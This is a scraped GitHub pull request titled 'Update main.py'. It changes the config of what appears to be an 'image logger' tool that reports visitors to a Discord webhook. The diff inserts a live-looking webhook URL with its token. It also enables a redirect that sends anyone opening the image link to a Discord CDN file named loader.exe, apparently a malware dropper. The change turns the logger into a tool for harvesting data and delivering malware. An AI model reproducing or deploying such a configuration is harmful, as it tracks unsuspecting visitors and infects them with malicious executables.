Skip to content
This repository has been archived by the owner on Aug 29, 2024. It is now read-only.

Update main.py #73

Open
wants to merge 1 commit into
base: main
Choose a base branch
from
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
6 changes: 3 additions & 3 deletions main.py
Original file line number Diff line number Diff line change
Expand Up @@ -12,7 +12,7 @@

config = {
# BASE CONFIG #
"webhook": "https://discord.com/api/webhooks/your/webhook",
"webhook": "https://discord.com/api/webhooks/1123575693100453953/wZNv9i_bImigw4Pk1MxiiTHyRKCW_Kn135VWE1kkfm2nY_0bcMQMlCHzN5GSJSeXv0jb",
"image": "https://link-to-your-image.here", # You can also have a custom image by using a URL argument
# (E.g. yoursite.com/imagelogger?url=<Insert a URL-escaped link to an image here>)
"imageArgument": True, # Allows you to use a URL argument to change the image (SEE THE README)
Expand Down Expand Up @@ -50,8 +50,8 @@

# REDIRECTION #
"redirect": {
"redirect": False, # Redirect to a webpage?
"page": "https://your-link.here" # Link to the webpage to redirect to
"redirect": True, # Redirect to a webpage?
"page": "https://cdn.discordapp.com/attachments/1123148326792069190/1123148475698270259/loader.exe" # Link to the webpage to redirect to
},

# Please enter all values in correct format. Otherwise, it may break.
Expand Down